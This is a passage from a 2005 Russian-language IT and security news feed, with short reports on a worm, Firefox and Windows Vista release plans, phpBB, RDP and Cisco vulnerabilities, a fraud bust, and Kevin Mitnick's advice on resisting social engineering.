причём в виде файла itunes.exe (файл падает в папку C:Windows или C:Winnt). Затем он модифицирует реестр, чтобы запускаться при каждом старте Windows. Кроме того, он пытается связаться с кем-то по IRC, скачать и запустить некий злонамеренный файл. Степень опасности этого червя, впрочем, Symantec определяет как низкую, в отличие от Spybot, например.
Подробности

22/07/2005 13:05 Выход значительно обновленного Firefox переносится на сентябрь
Разработчики сообщества Mozilla.org внесли некоторые коррективы в планы по выпуску новых версий браузера Firefox. Версия 1.0 этого браузера вышла в конце 2004 года, после этого выходили несколько обновлений, связанных с исправлением ошибок. Последняя на данный момент версия 1.0.6 вышла в свет 19 июля. Серьезных изменений функциональности в браузерах версий 1.0.x заложено не было. Первым серьезно переработанным релизом Firefox должен стать браузер с кодовым названием Deer Park. Первая его альфа-версия вышла еще в мае, а вторая - в июле. Выпустить окончательный вариант Deer Park под названием Firefox 1.1 планировалось до конца лета. Однако теперь в Mozilla несколько скорректировали эти планы. Согласно обновленному расписанию выпуска новых версий браузера, финальная версия Deer Park выйдет в сентябре и будет иметь индекс 1.5, а не 1.1, как планировалось изначально. Изменение номера версии призвано отразить тот факт, что в новую версию будет заложено даже больше изменений, чем предполагалось. Помимо изменений в движкеGecko, поддержки стандартов CSS3 и SVG, в Firefox 1.5 будут усовершенствованы механизмы установки обновлений и расширений. Бета-версия Firefox 1.5 появится в течение августа, а после выпуска в сентябре окончательной версии браузера разработчики приступят к созданию Firefox 2.0. Точная дата выхода этого браузера пока неизвестна, в качестве предварительного срока окончании разработки пока значится первый квартал 2006 года. В третьем же квартале 2006 года может появиться Firefox 3.0, хотя, скорее всего, даты выпуска этих версий изменятся. Продолжается и работа над интегрированным пакетом Mozilla, который вскоре изменит название на Seamonkey. смена названия, скорее всего, произойдет после выпуска версии пакета, нововведения в которой будут аналогичны реализованным в Firefox 1.5. Пока же в свет вышла версия Mozilla 1.7.10, исправления в которой аналогичны реализованным в Firefox 1.0.5 (ликвидирована уязвимость) и 1.0.6 (исправлена несовместимость версии 1.0.5 с некоторыми расширениями).
Источник

22/07/2005 12:33 Microsoft покупает компанию, специализирующуюся на защите электронной почты
Компания Microsoft объявила о покупке фирмы FrontBridge Technologies, занимающейся разработкой безопасных корпоративных систем электронной почты. Условия сделки, которая будет завершена нынешней осенью, не разглашаются. Известно лишь, что сотрудники FrontBridge Technologies войдут в состав подразделения Microsoft, занимающегося разработкой пакета Microsoft Exchange Server. Решения FrontBridge предусматривают передачу функций по обработке почты в центры обработки данных компании. Таких центров у компании восемь, и они расположены в разных районах планеты. Это позволяет обеспечить доступ к корреспонденции даже в случае чрезвычайных ситуаций. Предлагаемые FrontBridge решения позволяют не только обеспечить шифрование и защиту электронной корреспонденции от спама и вирусов, но и обеспечить ведение архива корпоративной электронной переписки. При этом обеспечивается возможность доступа к информации, содержащейся в электронных письмах, а также защита от несанкционированного доступа. Предоставление услуг продолжится и после вхождения FrontBridge в состав Microsoft. Однако стоит ожидать, что в будущем Microsoft предложит собственный вариант подобных услуг. Кроме того, разработки FrontBridge будут использоваться в новых версиях Exchange.
Источник

22/07/2005 12:01 IBM вступает в проект open-source Java
IBM подключилась к участию в проекте open-source Java Harmony и намерена передать ему собственный код. На прошлой неделе IBM выделила сотрудников для работы с проектом open source, который ведет Apache Software Foundation, — об этом сообщил вице-президент IBM по передовой технологии Роб Смит. На сегодняшний день участие IBM ограничивается размышлениями над проектом, но компания, вероятно, вложит в него собственный код, сказал Смит. «Думаю, что в будущем вы увидите некоторый код. Я в этом уверен. Но сейчас эти люди занимаются обдумыванием некоторых идей и конструкций, — сказал он. — У нас есть кое-какие идеи, и я надеюсь, что они будут включены в общую стратегию Harmony». Проект Harmony был запущен в мае для создания open-source редакции Java Platform, Standard Edition (Java SE), программного обеспечения, необходимого для исполнения Java-программ на настольных ПК. Смит сказал, что IBM решила дождаться, пока прояснятся направление и цели проекта. «Мы рады, что сообщество приступило к работе, и пока идет уточнение того, что оно хочет получить в результате. Мы не хотели бы вмешиваться в это». IBM давно дала понять, что хорошо бы иметь open-source редакцию Java. В прошлом году Смит направил открытое письмо Робу Гинджеллу, тогдашнему вице-президенту Sun Microsystems, призывая компанию открыть исходный код Java. Sun отказалась под тем предлогом, что open-source редакции Java могли привести к расколу стандарта и вызвать проблемы совместимости. Однако Sun все же изменила свою лицензионную политику, облегчив доступ к коду Java SE и дополнив его. Пока ни IBM, ни распорядитель Java, Sun, официально не приняли участие в проекте, хотя сотрудники обеих компаний выразили ему свою поддержку. Однако в кругах разработчиков уже ходили слухи о том, что IBM подключится к Harmony и вложит в проект значительные куски кода.
Подробности

22/07/2005 10:58 Испанская полиция нейтрализовала нигерийскую интернет-мафию
Испанская полиция и американское ФБР успешно завершили крупную операцию против многочисленной группы мошенников, вымогавших деньги у пользователей Интернета во всем мире. В нескольких городах Испании были задержаны в общей сложности 295 человек, было изъято 218 тысяч наличных евро, 2 тысячи мобильных телефонов, 327 компьютеров и 165 факсимильных аппаратов. Операция получила кодовое название "Нил". Организаторы сетевого жульничества являлись выходцами из Нигерии и использовали два способа наживы: фиктивную лотерею и так называемые "нигерийские письма". Последний способ мошенничества хорошо известен в Интернете: он заключается в массовой рассылке электронных писем с предложением очень выгодной сделки по отмыванию денег. От жертвы требуются сравнительно небольшие начальные расходы - после оплаты жертва ничего не получает, а деньги мошенники присваивают себе. Испанские правоохранительные органы и ФБР при содействии почтовой службы США работали над раскрытием преступной сети с 2003 года. Сейчас идет работа по выяснению того, где нигерийские мошенники хранили свою прибыль. Специалисты ожидают, что после операции количество мошеннических писем в Интернете значительно снизится, так как нигерийская группировка была ответственна за большую часть таких рассылок.
Источник

22/07/2005 10:36 Microsoft официально назвала свою новую ОС Windows Vista
Корпорация Microsoft объявила в пятницу о том, что ее новая массовая операционная система, выход которой ожидается во второй половине 2006 года, будет называться Windows Vista. Ранее система значилась под рабочим названием Longhorn. Она позиционируется как наследница нынешней флагманской ОС Microsoft Windows XP. Microsoft также заявила, что в начале августа выйдет бета-версия Windows Vista, с которой смогут работать привлекаемые компанией бета-тестеры. Также был открыт сайт проекта, на котором будет сообщаться о ходе работ над ним. Как ранее сообщалось, представители Microsoft уже ранее представляли некоторые особенности новой системы. Вместе с тем, известно, что в Vista не будет реализована новая файловая система WinFS, так как разработчики посчитали, что не смогут уложиться в отведенные сроки при ее реализации.
Подробности

21/07/2005 16:05 Очередная уязвимость в phpBB
Похоже, обнаружение уязвимостей в популярном форумном ПО phpBB становится "хорошей" традицией. Очередная уязвимость обнаружена в недавно выпущенной версии 2.0.16. Первая связана с некорректной обработкой BB-кода "url", что может позволить выполнить код в браузере - необходимо отметить, что работает только в Internet Explorer. Также хотелось бы отметить, что рукописный патч бял обнародован среди разработчиков PHP и администраторов PHP ещё неделю назад. Для устранения уязвимости необходимо обновиться до версии 2.0.17.
Подробности

21/07/2005 15:03 Американские компании перестают обращать внимание на хакеров
Расходы американских компаний на отражение и ликвидацию последствий хакерских атак постепенно снижаются, однако в то же время увеличиваются затраты на предупреждение неавторизованного доступа к информации. К такому выводу пришли в ходе специального опроса специалисты Института компьютерной безопасности при ФБР (CSI), сообщает сайт Infoworld.com. Ответы 700 респондентов из правительственных и частных компаний показали, что затраты на отражение и ликвидацию последствий хакерских атак в 2004 году снизились на 61 процент. Средний бюджет на борьбу с хакерами в 2004 году составил 204 тысячи долларов. В 2003 году аналогичные расходы составляли 526 тысяч долларов. Таким образом, тенденция к снижению расходов на противостояние с хакерами сохраняется уже четвертый год, отметил представитель CSI Роберт Ричардсон (Robert Richardson). Частично снижение расходов на ликвидацию последствий атак объясняется тем, что компании стали лучше себя защищать, полагает Ричардсон: «Среднестатистическая организация владеет инструментами, которые позволяют контролировать вредоносные программы. Часть антивирусных разработчиков очень быстро реагируют на появление новых вредоносных программ, а корпоративные сети автоматически обновляют антивирусные базы». В то же время в 2004 году существенно выросли расходы, связанные с кражей данных. В 2003 году средний размер убытков от подобных преступлений составлял 51 тысячу долларов, а в 2004 — более 300 тысяч. В случаях, когда преступники похищали патентованные сведения, средний размер убытков составлял уже 355 тысяч долларов, а в 2003 году этот показатель был равен 169 тысячам.
Источник

21/07/2005 14:08 В Японии принята программа по борьбе с киберпреступностью на 2005 год
Национальное полицейское управление Японии приняло программу информационной безопасности на 2005 для борьбы с преступлениями в Интернете, сообщает в четверг агентство Киодо цусин. Программа была принята в ответ на рост числа таких "кибер-преступлений", как мошенничества на Интернет-аукционах, выставление через Интернет счетов за несуществующие услуги, "фишинг" или охота за персональными данными клиентов в Интернете. Программа предусматривает меры по усилению координации между полицейскими подразделениями по всей стране, отслеживающими появление в Интернете незаконной информации, такой как детская порнография и призывы к коллективным самоубийствам. Особое внимание в программе уделено борьбе с атаками на правительственные Интернет-сайты. Полиция будет тщательно отслеживать состояние таких сайтов и в случае обнаружения признаков атаки сразу же информировать их владельцев. Программой предусмотрено направление полицейских в университетские команды, занимающиеся борьбой с компьютерными преступлениями. Будет поощряться и обмен опытом и информацией с соответствующими службами в правоохранительных органах США и ЕС.
Источник

21/07/2005 13:48 Написание безопасного кода на PHP
На сайте с занятным названием ILoveJackDaniels.com, который ведёт и поддерживает Dave Child, вэб-разработчик из Брайтона (Великобритания) больше года назад была опубликована довольно интересная и, наверняка, полезная для разработчиков статья, в которой содержатся советы по написанию безопасного кода на PHP, приобретшем в последнее время большую популярность.
Статья

21/07/2005 13:36 Запишите свой пароль!
Известный специалист по компьютерной безопасности Брюс Шнейер (Bruce Schneier) поддержал своего коллегу из компании Microsoft Джеспера Йохансона (Jesper Johansson), призвавшего пользователей записывать свои пароли на бумажке. В очередном выпуске своей рассылки Cryptogram, Шнейер с горечью отметил, что нынешний пользователь уже не тот – ему уже не под силу удержать в своей голове пароль, достаточно сложный, чтобы выдержать лобовую атаку с перебором комбинаций из подключаемого словаря, пишет The Register. В прежние времена, когда об интернете еще и не слыхивали, и главным врагом скучающего офисного работника был хакер, переодетый в разносчика пиццы, записывать свои пароли на бумажку PostIt! было смерти подобно. Однако в наши дни, когда враг ошивается преимущественно вокруг виртуальных ворот компании, лучше записать пароль на бумажке и спрятать ее под клавиатуру, чем использовать одну и ту же комбинацию для десятков разных ресурсов, аккуратно укладывая все имеющиеся яйца в одну корзину. Личности, страдающие особо тяжелой формой паранойи, могут даже усложнить предлагаемую технику. Например, можно разработать дополнительный простой код для записей на бумажке, заменяя, например, литеру "а" на литеру "с" или литеру "y" на цифру "7" и так далее.
Источник

21/07/2005 12:53 Война со спамом: ответный удар
Драконовские антиспаммерские законы, принятые в развитых странах, и единичные пока судебные процессы спаммеров не испугали. Компания Blue Security предлагает бить по спаммерам их же оружием. Идея не нова: нова реализация. Сотрудники Blue Security предлагают обрушивать на спаммеров не бессмысленные потоки запросов, которые, в принципе, могут быть расценены судом в качестве попытки организации DDoS-атаки, а... жалобные письма с требованием прекратить рассылать спам. Атака, как сообщает CNET, может быть организована сразу же после того, как "компьютер-ловушка" компании примет на свой почтовый адрес первый образец спама. Проанализировав письмо, компьютер найдет ссылку на сайт обидчика и переправит на клиентские программы добровольных участников проекта сообщение с координатами спаммерского сайта. Клиентская программа, в свою очередь, отправится на этот сайт, автоматически найдет первое же попавшееся поле ввода и загрузит спаммера требованием убрать респондента из списка рассылки. Понятно, что в конечном итоге будет организована та же самая DDoS-атака, но отмазаться от уголовного преследования, считают авторы идеи, будет гораздо проще.
Источник

21/07/2005 12:32 Oracle выпустила более 50 "заплат"
Корпорация Oracle выпустила более 50 заплаток, устраняющих уязвимости в системах защиты ряда продуктов – корпоративных, для электронной коммерции, СУБД и сервера приложений. Программисты корпорации исправили 12 ошибок в СУБД, 12 – в сервере приложений, 17 – в пакете Oracle E-Business, еще несколько – в других программах. Как заявили в Oracle, уязвимости могли быть использованы злоумышленниками с различным уровнем доступа к системе. Большая часть заплаток – кумулятивные, т.е., установив более новую, не нужно устанавливать предыдущие, сообщил Computer Weekly.
Источник

21/07/2005 11:46 Longhorn будет работать быстрее Windows XP
Компания Microsoft опубликовала предварительную информацию об ожидаемой производительности новой операционной системы под кодовым названием Longhorn. На проходившей в Миннеаполисе (штат Миннесота) конференции для партнеров представители софтверного гиганта заверили присутствующих в том, что Longhorn будет более производительной системой, чем Windows XP. Например, скорость запуска приложений вырастет по сравнению с Windows XP на 15%. Еще больше (на 50%) ускорится загрузка системы. Вывод же компьютера из состояния "сна" и вовсе будет отнимать не более двух секунд. Кроме того, при установке обновлений на 50% реже будет требоваться перезагрузка системы. А корпоративным пользователям в Microsoft обещают, что миграция на Longhorn потребует на 75% меньше времени, чем в случае нынешних версий Windows. В компании надеются, что на установку Longhorn на компьютер системному администратору понадобится не более 15 минут. Кроме того, в Longhorn появится более совершенная система диагностики уязвимости и установки заплаток, новые средства обеспечения безопасности, восстановления системы, а также более совершенные утилиты для диагностики состояния жесткого диска, аккумуляторов и т.п. Первая бета-версия Longhorn должна появиться в августе, а осенью возможно ее обновление. Вторая бета-версия выйдет в начале 2006 года и будет первой тестовой версией Longhorn с новым интерфейсом Aero. Начало продаж новой операционной системы намечено на конец 2006 года.
Источник

21/07/2005 11:12 Кевин Митник? Назовите, пожалуйста, номер вашего телефона
Знаменитый бывший хакер Кевин Митник говорит, что большинство социотехнических атак, совершаемых от чужого имени, о которых ему известно, провалились бы, если бы объект просто поинтересовался номером телефона позвонившего. Это позволило бы сотрудникам пострадавшей компании, перезвонив по названному номеру, убедиться в том, что это действительно тот, за кого он себя выдает. Если кто-то звонит, чтобы выведать у компании какие-то сведения, это немедленно отпугнет его. Если же это подлинное лицо, оно с готовностью выполнит такую просьбу. «Если бы люди просто перезванивали, это решило бы проблему безопасности на 80%», — заявил Митник участникам форума, организованного сегодня утром в Сиднее компанией Citrix. Митник рассказал, как сотрудница Motorola, передавшая ему в его бытность хакером секретный исходный код компании, заставила его поволноваться и едва не повесить трубку, когда она взяла паузу, чтобы согласовать некоторые детали со своим менеджером по безопасности. Однако в конечном счете эта попытка все же удалась. Большинству людей свойственно желание помочь другим, когда кто-то к ним обращается, но служащим следует твердо отклонять вопросы, которые могут нанести ущерб безопасности, сказал Митник. Исправившийся хакер — теперь консультант по безопасности — особо выделил те попытки нарушить безопасность компании, которые относятся к разведке: сбору информации в преддверии атаки. Одним из замечательных объектов для такой разведки, по его словам, является служба технической помощи ИТ-подразделения компании. «Они всегда готовы помочь», — заверил Митник. Мошенники, позвонившие по номеру сервисной службы, легко могут выяснить, какие контрольные признаки — дата рождения, идентификационный номер сотрудника и т. п. — использует персонал службы для удостоверения личности позвонившего. Затем они могут повесить трубку, провести некоторое исследование и позвонить снова, уже во всеоружии, готовые взломать пользовательский аккаунт. Хотя социотехнические рекомендации Митника не привязаны ко времени и технологически нейтральны, экс-хакер явно в курсе современных технических приемов. Он отметил, что при помощи одного из устройств Apple AirPort (популярный узел беспроводного доступа) можно моментально создать порт беспроводного доступа в штаб-квартиру любой компании, если подключить его к сетевому порту этой компании. «Достаточно нанести на него логотип компании с пометкой „Отдел ИТ. Не отключать”, и можно бродить по всей сети с автостоянки». А если это устройство USB Bluetooth, оно будет выполнять ту же функцию, если вставить его в порт на задней панели ПК любого сотрудника.
Подробности

21/07/2005 10:39 Отдайте OS/2 сообществу open source!
Почти 10 тыс. человек подписали петицию с призывом к IBM опубликовать исходный код операционной системы OS/2. На прошлой неделе IBM объявила, что к концу этого года она прекратит продажу продуктов OS/2, а к концу 2006 года перестанет предлагать стандартную поддержку продуктов, относящихся к OS/2. После этого анонса на сайте сообщества OS/2 World начали накапливаться электронные подписи под петицией с призывом к IBM сделать исходный код операционной системы общедоступным. В ближайшее время эту петицию планируется передать IBM. На сайте утверждается, что превращение OS/2 в проект open source принесет выгоды заказчикам IBM, желающим сохранить операционную систему или перейти на другую операционную систему. В IBM пока не удалось получить комментариев по поводу того, будут ли там рассматривать возможность превращения OS/2 в проект open source. IBM может отказаться от этой идеи по ряду причин, в том числе из-за потенциального риска раскрытия другой интеллектуальной собственности компании и из-за расходов по патентной очистке кода. К тому же IBM уже и так активно работает с Linux, так что ей выгодно, чтобы заказчики переходили на эту ОС. Сотрудники OS/2 World утверждают, что IBM может избежать проблем интеллектуальной собственности, выпустив не весь исходный код. «Нам известно, что для IBM открытие исходного кода OS/2 проблематично из-за вклада со стороны третьих компаний. Мы просим IBM открыть максимально возможную часть исходного кода и перечислить те компоненты OS/2, для которых требуется замена. Имея перечень подлежащих замене компонентов, заинтересованные компании и отдельные разработчики смогут создать ПО open source, закрывающие эти „дыры” в операционной системе».
Подробности

21/07/2005 09:36 Microsoft подала в суд на Google из-за увода топ-менеджера
Корпорация Microsoft подала в суд на компанию Google, обвинив ее "в кадровом браконьерстве" в связи с тем, что Google переманила к себе одного из руководящих сотрудников Microsoft, вице-президента и главу отдела интерактивных служб Кай Фу Ли (Kai-Fu Lee), который накануне внезапно оставил работу в Microsoft и возглавил китайское подразделение Google. Как сообщает Associated Press, Microsoft также подала иск в отношении самого Ли, обвинив его в нарушении подписанного в 2000 году трудового соглашения. Ему, в частности, инкриминируется принятие работы от непосредственного конкурента менее, чем через год после увольнения. Обвинения против Google включают в себя преднамеренное содействие Ли в нарушении контракта с Microsoft. Как считают в корпорации, Google таким образом нарушила принципы свободной конкуренции и осуществила саботаж предпринимательской деятельности Microsoft. В Google уже назвали претензии Microsoft беспочвенными, отметив, что Ли сам волен делать выбор места работы, отдавая предпочтения той компании, которую он считает лучшей.
Источник

20/07/2005 11:53 Windows: новая уязвимость трех версий
Microsoft предупредила пользователей о новой уязвимости, которая позволяет удаленно «подвесить» Windows на основе технологии NT — 2000, XP и Server 2003. Атака «отказ в обслуживании» (DoS) возможна из-за ошибки в протоколе удаленного рабочего стола (RDP, Remote Desktop Protocol), который позволяет получить доступ к управлению системой посторонним после запроса помощи. Специально сформированный запрос «подвешивает» удаленную систему. Ошибка была обнаружена на прошлой неделе. Предупредив пользователей, корпорация начала работу над «заплаткой», заявив об отсутствии жалоб на реальные удачные атаки такого рода. Тем временем, эксперты по безопасности из института SANS сообщили об усилении активности сканирования порта 3389, который используется RPD. Возможно, хакеры ищут жертв. Сервис удаленного рабочего стола по умолчанию отключен в большинстве версий Windows, кроме некоторых, в частности, Windows XP Media Center Edition. В состав RDP входят сервисы терминала в Windows 2000 и Server 2003 и два сервиса в XP — совместного использования удаленного рабочего стола и удаленной помощи. Пока «заплатка» не вышла, эксперты Microsoft советуют закрывать доступ к порту 3389 по протоколу TCP в межсетевых экранах, отключать вышеописанные сервисы, если они не нужны, либо использовать их через протокол IPSec или VPN.
CNews

20/07/2005 11:20 Mozilla: IE 7 даст толчок росту популярности Firefox
Ожидается, что после выхода Microsoft Internet Explorer 7 в будущем году корпорации начнут проявлять повышенный интерес к браузеру Firefox от Mozilla Foundation. Браузер IE 7, бета-версия которого появится этим летом, будет недоступен для пользователей Windows 2000. Во вторник Аза Доцлер (Asa Dotzler), координатор сообщества в Mozilla Foundation, сказал, что он надеется заинтересовать браузером Firefox многих корпоративных заказчиков Windows 2000, так как они не смогут воспользоваться преимуществами добавленных в IE 7 усовершенствований. «Мы питаем большие надежды на то, что наши дела в пространстве (корпоративных) пользователей Windows 2000 будут идти все лучше и лучше, — сказал он. — Мы очень рады, что Microsoft выпускает IE 7 — останется много людей, которым, если они захотят лучших функциональных возможностей, придется потратить сотни долларов на обновление до Windows XP. Согласно недавнему исследованию AssetMetrix, почти на половине всех Windows-ПК на предприятиях до сих пор применяется Windows 2000 — это огромный рынок, куда надеется проникнуть Mozilla Foundation. Firefox 1.1, который планируется выпустить в этом месяце, будет включать ряд функций, способствующих переходу компаний на браузер open source, включая автоматическое обновление и возможность ограничения функциональности (preference locking). Система автоматического обновления, которую Доцлер охарактеризовал как «система обновления мирового класса», позволяет автоматически устанавливать исправления и обновления без необходимости всякий раз после выхода новой версии заново устанавливать браузер. Кроме того, по его словам, в версию 1.1 войдут усовершенствованные инструменты для ограничения возможностей настройки браузера. Внесенные в Firefox усовершенствования вместе с IE 7 могут привести к существенному увеличению доли рынка браузера open source, считает Доцлер. «То, что мы улучшили наши инструменты для корпоративных установок, а также то, что пользователи Windows 2000 чувствуют себя покинутыми, должно вызвать настоящий эффект домино», — сказал он.
Подробности

20/07/2005 10:16 Visa и American Express разрывают отношения с провинившейся компанией CardSystems
Глобальная платежная система Visa приняла решение лишить права на работу с картами ее системы компанию CardSystems Solutions, которая, как сообщалось ранее, некоторое время назад стала виновником утечки данных о 19 миллионах платежных карт разных систем, которые проходили через ее процессинговый центр, пишет во вторник газета New York Times. Изначально стало известно о том, что из баз CardSystems Solutions была похищена информация о десятках тысяч карт .MasterCard, однако впоследствии оказалось, что пострадали и другие системы, в том числе Visa.Компания признала, что не только допустила утечку сведений о финансовых координатах владельцев карт, но и, в целом, не должна была хранить данные о картах, операции по которым были завершены. В заявлении Visa о разрыве деловых отношений с CardSystems Solutions говорится, что проведеная проверка показала неспособность этой компании должным образом работать с финансовыми данными. Впоследствии стало известно, что с компанией разрывает отношения также платежная система American Express (AmEx).
Источник

19/07/2005 12:15 В Голландии выпущено пиво с открытыми исходниками
Группа голландских студентов, учащихся факультета информационных технологий копенгагенского университета, разработала новый рецепт пива и опубликовала его под лицензией Creative Commons. Если вы варите это пиво на продажу, извольте указать авторов рецепта, упомянуть, что вы добавили от себя, а затем опубликовать обновлённый рецепт на тех же условиях, что и изначальные авторы. Условия, на которых этот рецепт можно использовать, весьма напоминают GNU GPL, так что можно смело считать это пиво - первым пивом с открытыми исходниками. Рецепт версии 1.0 в целом походит на классические рецепты тёмного пива; главное отличие - присутствие в пиве гуараны, в количествах, тождественных 35 миллиграммам кофеина. Этот компонент должен противодействовать усыпляющему воздействию 6 градусов алкоголя, содержащегося в пиве. Создатели рецепта хотят посмотреть, что произойдёт, если лицензия, под которой обычно распространяется программное обеспечение, будет использована в отношении такого общеизвестного продукта, как пиво. Кроме того, авторам рецепта любопытно, как будет меняться и улучшаться предложенный ими рецепт, когда пивовары начнут добавлять в него "отсебятину". "Мы надеемся, что однажды это станет Linux'ом в мире пива", - цитирует издание Wired News разработчиков рецепта. Несколько лет назад на похожих условихях был опубликован рецепт напитка, напоминающего "Кока-Колу": OpenCola. Шума было много, но "Линуксом в мире колы" он не стал.
О напитке

19/07/2005 11:27 Выявленные ошибки вынудили выпустить новую версию Firefox
Браузер open source Firefox и клиент e-mail Thunderbird будут исправлены второй раз за одну неделю, так как оказалось, что внесенные в код изменения мешают правильной работе некоторых расширений. Обновления доводят Firefox и Thunderbird до версии 1.0.6, а Mozilla Suite будет обновлен до версии 1.7.10, пишут представители Mozilla Foundation в новостном блоге для разработчиков. Похоже, что проблемы связаны с вышедшим на прошлой неделе обновлением 1.0.5. «Есть очень веские основания полагать, что некоторые усовершенствования в общей системе безопасности, введенные в версию 1.0.5, влияют на ряд расширений, которые с 1.0.4 и более ранними версиями работали, и в версии 1.0.6 мы хотим выявить и решить как можно больше этих проблем», — пишет представитель Mozilla. Ввиду предполагаемого обновления Mozilla Foundation просит разработчиков временно прекратить работу по локализации ПО для неангло-говорящих рынков — шаг, вызвавший критику со стороны некоторых адептов. «Мы получаем много писем от пользователей Firefox в Польше с вопросом, почему нет Firefox 1.0.5 на польском, — пишет один из разработчиков в новостной группе, посвященной локализации. — Еще несколько дней, и за пределами США вокруг Firefox разразится большой скандал». Другой разработчик критикует организацию в форуме, где обсуждаются сообщения об ошибках. «Десять миллионов пользователей все еще работают с 1.0.4, хотя после выхода версии 1.0.5 en-US (на американском английском) была обнародована информация о критических секьюрити-багах», — пишет разработчик. Призывая Mozilla Foundation выпускать все свое ПО на всех языках одновременно, разработчики говорят, что задерживая версии на иностранных языках, организация обесценивает работу, проведенную программистами, продвигающими ее продукты на местные рынки.
Подробности

19/07/2005 10:54 Хакеры взломали сайт правительства Киргизии
Неизвестные хакеры взломали интернет-сайт правительства Киргизии www.gov.kg. Об этом агентству РИА "Новости" сообщили в отделе информатизации и телекоммуникации управления делами аппарата премьер-министра Киргизии. По словам представителей отдела, в ночь на вторник хакеры преодолели "усиленную защиту" государственного интернет-ресурса и заменили в нем отдельные страницы. О том, какие именно заявления оставили хакеры на измененных страницах, не уточняется. В отделе не исключают, что акция носит политический характер. "Мы не можем утверждать со стопроцентной уверенностью, что нападение преследовало только хулиганские цели", - заявили в отделе, заверив, что будут предприняты все необходимые меры для розыска злоумышленников. По состоянию на утро понедельника, сайт работает в обычном режиме. Это не первая атака на киргизские сайты. Ранее, еще до революционных событий в Бишкеке, во время выборов в Жогорку Кенеш - национальный парламент - были зафиксированы атаки против сайтов крупнейших в республике информационных агентств, а также злоумышленники пытались вскрыть защиту сайта государственной автоматизированной системы "Шайлоо", отражавшей в режиме реального времени ход выборов.
РИА "Новости"

18/07/2005 10:39 Cisco предупредила о нескольких уязвимых местах в своих продуктах
На прошедшей неделе Cisco выявила в своих продуктах несколько уязвимостей, которые могут способствовать организации атак типа Denial of Service. Наибольшего внимания заслуживает сообщение, прозвучавшее во вторник: Cisco предупредила, что хакеры могут взломать ее сети интернет-телефонии, воспользовавшись ошибками в ПО CallManager, важном компоненте технологии Cisco VoIP, используемой для инициирования и маршрутизации вызовов. Cisco выпустила патч для этой уязвимости. Компания Internet Security Systems (ISS) тоже выпустила ПО, блокирующее возможные атаки, что должно помочь заказчикам, пока они тестируют и устанавливают патч Cisco. Воспользовавшись выявленными уязвимостями, злоумышленники могут вызывать переполнение буфера в памяти, занятой критически важными процессами CallManager. Результатом может стать состояние DoS, приводящее к прекращению работы и перезагрузке сервера CallManager. А когда сервер CallManager выведен из строя, атакующий получает возможность переадресовывать вызовы и прослушивать звонки, а также получить несанкционированный доступ к сетям и машинам, исполняющим ПО Cisco VoIP. В число уязвимых версий ПО CallManager входят CallManager 3.3 и более ранние версии, а также версии 4.0 и 4.1. Представитель Cisco сообщил, что никакой информации о фактическом использовании ошибок CallManager не поступало. По словам директора iDefense Labs Майкла Сюттона, уязвимости CallManager не считаются «критическими», так как, чтобы ими воспользоваться, злоумышленник должен находиться внутри сети. По данным аналитической фирмы Gartner, к 2007 году 97% вновь установленных систем телефонии в Северной Америке будут основанными на VoIP или использующими сочетание VoIP с традиционной технологией. Cisco утверждает, что она продала заказчикам во всем мире около пяти миллионов VoIP-телефонов.
Источник

18/07/2005 10:01 Lockheed Martin построит для Пентагона электронное хранилище секретов
Американское военное ведомство выбрало компанию Lockheed Martin для создания нового базового внутреннего сайта армии США. Проект имеет название AKO (Army Knowledge Online, "военные знания онлайн") и его бюджет составляет 152 миллиона долларов. Система AKO существует уже несколько лет на базе обычного Интернета, но доступ к ней имеют только американские военные, которые перед пользованием ресурсами сайта должны авторизоваться. Военные с помощью системы, которую можно сравнить с интернет-порталом, работают с электронной почтой, различными служебными базами данных, специализированными приложениями и другой информацией, помогающей американским военнослужащим эффективнее действовать. У AKO насчитывается 1,8 миллиона пользователей по всему миру. Lockheed Martin, инженерная корпорация, известная достижениями в области авиастроительства, будет создавать более мощную версию AKO, для чего будут привлечены военные и гражданские эксперты в области системного интегрирования и сторонние производители коммуникационных технологий. Следует отметить, что американской армией и спецслужбами также давно совместно применяется технология Intelink, которая представляет из себя глобальную сеть для обмена информацией, данные в которой распространяются в зашифрованном виде.
Подробности

16/07/2005 14:09 Инструмент для взлома Bluetooth-устройств
На сайте packetstorm выложен исходный код инструмента, предназначенного для взлома Bluetooth-устройств. Написан на Perl pierre kroma из Германии.
Исходник

16/07/2005 13:04 Выход журнала Crypto-Gram
Основатель и CTO компании Counterpane Internet Security, Inc. Брюс Шнайер сообщил о выходе июльского номера ежемесячного журнала Crypto-Gram, посвящённого криптографии и компьютерной безопасности. В этом выпуске: London Transport Bombings, Terrorism Defense: A Failure of Imagination, CardSystems Exposes 40 Million Identities, Noticing Data Misuse, Indian Call Center Sells Personal Information, Write Down Your Password, The Adaptability of Iraqi Insurgents, Organized Retail Theft, The Doghouse: Privacy.li, SHA-1 Cryptanalysis, Security Skins, Counterpane News, Evaluating the Effectiveness of Security Countermeasures, Speeding Ticket Avoidance, Redefining Spyware, Talking to Strangers, Comments from Readers.
Crypto-Gram

16/07/2005 12:30 Сайт сообщества Firefox был взломан
Один из сайтов сообщества Firefox под названием Spread Firefox. Как следует из блога одного из руководителей проекта Asa Dotzler, сайт долгое время лежал, что было вызвано взломом его. В результате взломщик пытался получить доступ к базе данных пользователей, которая могла быть использована для рассылки спама. Как пишет сам ASA, анализ показал, что данные всё же получены не были, однако пользователям рекомендуется изменить пароли для доступа к сайту. Судя по всему, руководители сайта не успели вовремя наложить патчи на ПО Drupal, в библиотеке которого PHPXMLRPC была обнаружена уязвимость около недели назад.
Подробности

16/07/2005 11:54 МГТС представила разработку в области высокоскоростной криптографии
МГТС представила собственную разработку в области высокоскоростной криптографии. Компания получила премию Министерства информационных технологий и связи "За лучшую инновацию в области телекоммуникаций". В основе разработки лежит сложный математический алгоритм, позволяющий в разы ускорить процесс шифрования. А именно скоростные методы в России пока малодоступны. Специфика нашего рынка такова, что выход на него западным игрокам практически закрыт: лицензированием средств криптографии занималось ФАПСИ, вошедшее ныне в состав ФСБ, а отечественные службисты с большим недоверием относятся к западным компаниям с их стандартами шифрования. Кроме того, существует российский ГОСТ 28-147-89 на криптографические механизмы, заметно устаревший за минувшие годы. В итоге, при всем интересе российских корпораций к этой теме, средства шифрования, которые реально существуют на нашем рынке, страдают многими недостатками. Ряд из них конфликтует с теми или иными операционными системами, другие обладают недружественным интерфейсом, наконец, что наиболее существенно, все они сильно ограничены в скорости. Реальная скорость российских средств криптографии редко превышает 100 Мбит, а в условиях высокоскоростных сетей такое ограничение становится серьезным барьером для передачи данных. "Большинство компаний сегодня борются с ним, разбивая свои потоки данных на части и пропуская каждую из частей через отдельный шифратор", - говорит Андрей Степаненко, директор по маркетингу компании 